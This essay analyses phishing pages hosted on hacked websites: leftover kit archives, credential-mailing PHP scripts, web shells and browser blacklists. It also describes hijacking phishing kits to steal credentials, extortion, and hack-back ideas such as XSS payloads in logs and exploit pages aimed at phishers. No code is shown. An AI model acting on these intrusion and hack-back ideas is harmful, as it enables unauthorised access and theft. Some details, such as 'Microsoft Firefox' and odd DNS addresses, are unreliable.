Misleading titles can ruin your reading. But since the above could mean more than just what it appears it is better to clear it right now. This document will talk about how innocent, unprotected websites can be used anchors. They are harbours, they are docks for Phishing activities. This document will discuss and show how Phishing already exists as a service not just for the Phishers but also for passer-bys who intend to use/misuse the service. A lot of times FaaS is unintentionally offered without the knowledge of the phisher to smarter visitors than the targeted audience in their minds.
This document is not a step-by-step guide to How-To-Set-Up-A-Phishing Page. It’s a practical autopsy of live phishing pages which were stumbled upon. This document will demonstrate how as a potential or a past victim of a phishing request you can help stop further damages. This document will point mistakes and trails left by phishers. If you are a phisher and are reading this document then you can rate yourself after checking if you did any of the blunders discussed in here.
A lot of times cyber criminals break into a large number of websites using just one common vulnerability. For example, a recent Wordpress or Joomla plugin’s SQL Injection exploit OR a recently discovered admin backdoor in another CMS or a buffer overflow in a web service which applies to more than just one version can prove to be a good earning phase for people with malicious cyber intents. By leveraging just one particular vulnerability these people can break into thousands of systems in one go! It's like a mad scientist discovering a flaw in human immunity and crafting a nasty virus to unleash over an entire continent using an UAEV / drone.
Uses for compromised systems
In the case of cyber scene, a vulnerable, exploitable system can prove to be of more than just one use. A vulnerable, exploitable system can be compromised in more than one way. The system could be:
1] Transmogrified as a bot, part of a large botnet.
2] Converted into a command and control server for other bots.
3] Misused as a drop point for confidential files extracted from other infected computers and corporate systems. These files could be documents, banking details, passwords, etc.
4] Turned into a host for serving phishing pages.
6] Used to crunch bitcoins.
7] Configured to gather the passwords of banking accounts, social networking websites, email accounts, etc. from its ownself.
The list of ways to compromise a system is not endless, but it is quickly growing as malevolent people are finding newer uses for compromised systems. The screenshot of a phishing setup below clearly shows cc99.php (a variant or a renamed form of C99 PHP WebShell Script which is often used by attackers to maintain access on a compromised server supporting PHP scripts).
Quite recently I had been keeping an eye on a lot of phishing websites and pages which pop up all over the Internet. Out of the thousands of phishing pages which pop up daily, only a few of these get reported to PhishTank and other phish-tracking systems. These services are used by many browsers, ISPs and companies with assets to protect. PhishTank itself can be a really good place for cybercrooks, or anybody, to earn some extra money. It is quite simple.
For example, you visit and rip-off a recently discovered phishing page which has been hosted on someone else’s website, and not as a stand-alone website, made especially to phish. The reason being that phishing pages hosted on hacked websites are generally uploaded after hacking into the website. Which means, a weak password, a weak configuration file giving away a password or hash, or a direct exploitable vulnerability could get you in.
Most phishers are only interested in planting phishing pages on as many websites as they can, so that even if one of them gets shut down or deleted they can change the dynamic DNS or their domain to point to some other place. If they are using a direct link in the emails then they just craft one more with a new URL containing the same page content. Very few phishers go out of their way to patch the hacked website to disallow others from gaining access. But sometimes even breaking in is not required (as the screenshot below demonstrates).
After a few lines of reading this you will come across a few screenshots which have been obtained without breaking into the server.
Crackers who attack and break into massive numbers of IP addresses / websites often run automated or batch script. These include right from resolving IPs, carrying out the SQL injections, database dumping, to uploading the phishing page. These pages are often zipped and uploaded and many times they forget to delete the original zip file after extracting it.
If you are lucky, the directory listing will be enabled and you can directly view and download the original zip file with the phishing website pages in it, along with the PHP source which contains the email addresses.
Fetching the bounty / Retrieving the data
So if you come across a phishing page then there are high chances that breaking into it would not require much effort. But what after breaking in? You don’t intend to plant one more page of a different bank right?
Every phishing page aims to retrieve user names, account numbers, transaction and login passwords. Hence they either save the gathered data on a local or remote disk or they email the data back to themselves.
1] Save the data to a local or remote location.
2] Email it to the cracker’s email address.
Saving on local disk is too risky and requires the attacker to revisit the website again and again. This causes leaving more traces and hence cleaning more traces. Saving on a remote disk requires passing credentials. Email on the other end is more convenient but equally risky. A network sniffer on the website’s end, at the shared host’s end or at any suitable, sniffable at location along with the risk of getting that system hacked or taken down also has to be taken under consideration by the would-be attacker.
Live monitoring / Security Operations Center (if available for that website) will instantly give away the malicious intents of the phisher and state of the hacked website. Phishers generally do not encrypt the information before emailing it.
Another constraint for emailing is that the server should have a mailer-daemon like sendmail, qmail, other active and running if it’s a *nix system. For a compromised Windows system with PHP running, a mailing agent has to be installed; hence they either push the details to a MySQL Database or prefer websites with ASP running to make emailing easier. A very few phishers use FTP as a method to upload the information on a remote server.
Despite of all this phishers prefer to use the emailing method.
Screenshots shown below are taken from source codes of two separate phishing pages for NEDBANK Online banking:
The pictures clearly show that the recipient addresses are stored on the compromised systems in plain-text.
A funny incident happened once where the host server didn’t have PHP enabled. On hitting “Login” after entering the credentials on the phishing page, instead of the PHP file getting processed, its source code got echoed out onto the screen – clearly displaying the email addresses to which the credentials were meant to be sent.
Breeds of Bounty Raiders / Types of phishers
Four kinds of attackers can take advantage of the above:
1] Fruit Sucker: Where another bad guy breaks into a hacked, vulnerable website with an existing phishing page and changes the address where the details are emailed to or keeps the original addresses too along with his in Bcc. This is a very easy way for him to make extra money. All password and account numbers keyed in reach his inbox directly without tipping off the original phishers. If the phishers are rookies and lack automated money transferring scripts, are too lazy to work 24/7 and are situated in a different time zone, then these advantages can help the fruit sucker to withdraw a large amounts (leaving a few behind) from the compromised accounts before they do.
2] CXOck Sucker / Spear Sucker : A second kind of attacker could be a good guy who breaks into the phishing websites and changes the email address to the NEDBANK’s CSO’s email or NEDBANK’s CEO’s email address. After this he contacts the bank or maybe before and asks for a small remuneration for his services.
Also reworded as :
An attack against the original crackers. For example, a good guy who breaks into the phishing websites and changes the email address to the NEDBANK’s CSO’s or CEO’s email address. After this he contacts the bank to make them aware of the security breach.
3] Haxtortionist: When an attacker patches the system, pull down the phishing page and emails the attackers threatening them that he would report abuse of those email addresses and inform NEDBANK. Now you cannot easily report abuse to email servers hosted in Ukraine and Afghanistan but sure reporting abuse to the ones hosted on Google, Yahoo and similarly large companies can be tackled easily in the USA. In this way the attacker extorts out a small share of money from the original crackers in return for unlatching the hacked website and keeping silent, not telling on their email addresses where the details are getting transferred. Although the chances of getting paid through haxtortion are slim but it’s a way.
4] Robin-HAT: Here the attacker, after collecting a lot of passwords, changes the recipient’s email address for the purpose of redistributing wealth. He/She withdraws money from the accounts and donates a significant portion to charity. Such individuals cannot be called grey hats because they are criminals robbing from other criminals. They are Robin-HATS, those who steal from rich victims and their attackers and redistribute the wealth to the poor and needy.
Another version on this above type of attack: the Robin-HATs uniformly redistributed the assets from the richer compromised accounts to the compromised accounts which had lower funds; especially if particular attention was paid to those accounts with low balances for a prolonged period of time.
A fifth term might be – a good guy robbing from a Robin-HAT – that could be called a Bat-HAT.
Ghosts in the Phishplex
One strange thing noticed was at the end of index.php from one of the phishing pages.
The content is show below:
The content of .htaccess or maybe php.ini file was found in index.php.
The presence of the IPs may be the result of a clipboard action malfunction. On the other hand, it could be a deliberate ploy by a counter-attacker. Another logical reason could be that they intended to block visitors who know the page is a phishing trap. This would also deny access to the few individuals who are on their own blacklist. These could include known IP addresses originating from Antivirus Companies and other Anti malware organizations.
On another randomly stumbled website was hosting the VISA Phishing page. Directory Listing shows visa.zip directly placed without any obscure naming.
One opening this file we found another innocent looking JPEG file called visa.jpg. As seen in the screenshot, it’s actually a compressed archive and not just a JPEG Image file.
The PHP file is using fopen() and fwrite() to save the contents to a file rather than emailing it.
The phishing website with the visa.zip file took both actions; it saved the contents and then emailed them.
Another dual-action scenario was seen for a phishing setup for Halifax Online Banking. The screenshot below now should be self-explanatory because the phishers aren’t very creative when it comes to PHP and Perl scripts to email the juice.
As a backup option another PHP file emails the juicy info and deletes the log file so as to disallow it from being read by others. On every POST it extracts the information, emails and deletes the file.
Helmets for Phishers
Workarounds for Phishers to avoid their Phishing page being detected by potential victims:
Just like a malicious packet hitting an IDS, a computer virus or a biological virus infecting an unaware host, unless there is presence of the signature in the blacklist, it doesn’t get detected. Same applies to Phishing pages. Unless a phishing page has been reported earlier as a scam page, it won’t get detected by your browser which relies on blacklists. Regular and automate checks can help the phisher to keep tabs on the anti-phishing services and get alerted when the real cause of the existence of the page gets openly known. The phisher can track when the page gets blacklisted.
Staying safe from Phishers
This applies to functions in browsers like Opera, Internet Explorer, Chrome and Microsoft Firefox.
Opera relies on blacklists from Netcraft and calls the feature as Fraud and Malware Protection.
Every URL you visit first goes to sitecheck2.opera.com (one of the noted IP is 184.108.40.206).
Microsoft Internet Explorer calls its feature to detect and report malicious websites as “SmartScreen Filter”
It can be enabled as shown in the screenshot above or go to Tools / Internet Options/ <Navigate to the "Security level for this zone" area> / Click on Custom level... / Miscellaneous/ Use SmartScreen Filter / Enabled
Similar checks are done by Microsoft Internet Explorer, Chrome and Firefox.
Alternatively you can use OpenDNS as your DNS on your Ethernet and wireless cards IP configuration.
Although using OpenDNS might not be as quickly updated as (as observed in a few tests) and takes you to a search engine (possibly powered by Google) on every website which is failed to get resolved, still
it is quite good at maintaining uncorrupted, un-poisoned DNS records. It’s reliable when you suspect your ISP of injecting iframes, redirecting you and tracking your visits.
OpenDNS can be set by filling DNS as 220.127.116.11 and 18.104.22.168 (as Alternative or vice-versa)
Such features greatly reduce the chances of a person falling prey to phishing websites if it has been reported. On an average it takes not more than 8 hours of hosting a phishing page, before somebody reports it. This is a very long gap because it has been seen that in Asia (maybe in other continents too) banks are provided Phishing alerts by 3rd parties who sign an SLA stating that they have to inform the banks within 5 minutes of a phishing page popping up on the internet. That’s right. This means that right now if you are surfing directly using a system having a public IP address and if you deliberately host a phishing page or if some cracker compromises your system and hosts a phishing page and sends out a phishing email, if that third party is lucky to receive that email, their team needs to detect, check and report it within 5 minutes. They’ll report the page to the banks and maybe even inform Phishtank, NetCraft, Haute Security, etc.
Searching for Phishers ?
Phishers host banking and other phishing pages, then write socially engineered emails and send them to users across the globe. Most often they have a massive list of email addresses and names. They also regularly buy and sell such information, including full names, birthdates, email addresses, age, gender, phone numbers, etc. This type of information can also be used for identity theft.
What’s important here is that during this filtration process, the phishers try to leave out suspicious emails which could belong to people in the Internet security domain. Most of the emails are sent to addresses which do not end with a corporate or company domain name. So only expect your Yahoo! spam folder, or other public email hosting services, to be filled with phishing emails.
If you are interested in starting your own research into phishing or building a company similar to PhishTank, you can begin by signing up a dummy email address onto a lot of questionable websites – especially porn and warez websites. Just give out your email address freely and the URIs for recently hosted phishing pages and scam emails will start pouring in for your research and action.
Despite all of the efforts by phishers to avoid sending emails to antivirus/anti-phishing companies and other information security domains, a dummy email (similar to the type previously mentioned whose sole intention is to infiltrate would-be phishers) may be included on their massive email list. That’s all it takes. Once he/she reports the page, the browsers become aware of the malicious nature of the page. And once that happens, the scale of users that will be affected by the scam goes down drastically.
The above was just the problem statement for a typical phisher. How do phishers overcome the above? How do phishers avoid being exposed? What’s the work around for phishers so that the websites which they compromised which host phishing pages can reach out and steal your money?
For this we have to go back a few lines above where-in we pointed out settings for browsers to detect phishing pages.
Before taking you to the page where they ask for your credentials, phishers can point you to a page which contains a shellcode to disable Anti-Phishing checks, change your DNS to their custom DNS Server and then redirecting the victim to the actual Phising page. There are a few chances that anybody who reports would report the page to which the victim was redirected and not page which redirected the victim after executing a shellcode to disable phishing checks.
To prevent being a victim in this type of attack a heuristic scan to compare the contents of pages with lists of well-known websites like PayPal, American Express Bank, CitiBank, etc. should be done. That way the browser can detect rogue pages as per the DNS and other matching checks and does not have to rely solely on the blacklists.
Strengthen the current. Make the catch difficult / Defending against potential phishing attacks
How to make a phisher’s life difficult:
• In situations where the phisher relies of gathering credentials from a file where all data gets saved, it is easy to fill the log file with garbled text or XSS and CSRF capable code. Not always but, the phisher might view the logs in a browser or using some client-side software. A multi-attack vector covering all possible vulnerabilities and client software which might be used to view the logs can help the victim attack the attacker and possible gain access to their command and control center too. It is definitely a long shot but worth the attempt.
• Banks can deliberately visit the phishing pages and key in a custom username and password which won’t work online to buy stuff but when the frustrated phisher would key it in. These credentials would be red-flagged honey-comb-credentials. These are not real accounts but are made for the phisher to use so that when entered on the real-banking website, a form opens which sends browser exploits to the target aiming to gain a shell of the phisherman’s system. This would send back the IP address and other system details.
There are high chances the attacker could be behind Privoxy, TOR etc. Under such scenarios the special crafted page will have to do a name resolution of the IP and on detecting it as Torred or Privoxy’d would reply back that “browsing using Tor is not supported”
A desperate phisher might just switch over to his real IP and try to logon to the banking terminal, hence giving away more than just his identity and location easily.
The best bet is to redirect the attacker to a browser pwning page silently after he keys in the (fake) honeycomb-credentials.
While it is true that setting up phishing pages is fairly an easy process, doesn’t require any huge investments and is one of the simplest cyber-crimes to pull off but still it’s one of those crimes wherein the thief himself/herself might get mugged by passer-by and likeminded criminals.
It’s like how a fake ATM, recording magnetic strips and codes of customers, itself can get stolen at the end of the day by a smarter thief. The website storing the victims’ credentials’, the stash itself, could get robbed! Phishing is a double edged sword except for the fact that the pommel and hilt itself can be sharper than the blade.